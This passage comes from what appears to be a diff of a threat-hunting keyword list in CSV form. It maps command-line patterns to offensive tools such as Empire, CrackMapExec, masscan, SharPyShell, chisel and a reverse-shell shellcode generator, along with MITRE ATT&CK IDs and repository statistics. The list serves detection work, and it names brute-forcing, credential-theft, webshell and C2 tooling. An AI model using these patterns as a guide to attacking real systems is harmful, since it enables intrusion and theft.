T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"* --input 10m_usernames.txt*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"* -InputPath .\TrustedForests.txt*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" "* instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "* instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" -"* install *masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"* install *masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "* install armitage*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" -"* install autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"* install backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* install chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - 
T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"* install autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"* install backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* install chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "* install evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* install github *merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"* install github *merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "* install hekatomb*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" -"* install holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"* install holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "* install 
krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" "* install nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"* install wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"* install wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* install wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"* install wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* install wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* 
install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "* insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "* intel -d * -whois*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "* interact -u http*://*/*.aspx -p *","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "* --interface * --analyze --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 
- T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --interface * --analyze --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -Internalmonologue -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* Inveigh-*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Internalmonologue -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* Inveigh-*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* invoke query *FROM SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* invoke_sessiongopher*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* invoke_vnc*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* invoke_sessiongopher*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* invoke_vnc*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --ip * --port * --type cmd --language *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" -"* -ip * -smb2support *lwpshare* ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -ip * -smb2support *lwpshare* ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -IP * -SpooferIP * -HTTP N*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* --ip * --variable shellcode *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "* ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1040,49 +1040,49 @@ "* iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --isroca --publickey *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -it bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"* -it bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "* jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -JMXConsole -AppName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* john_done*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_fork*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_load*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
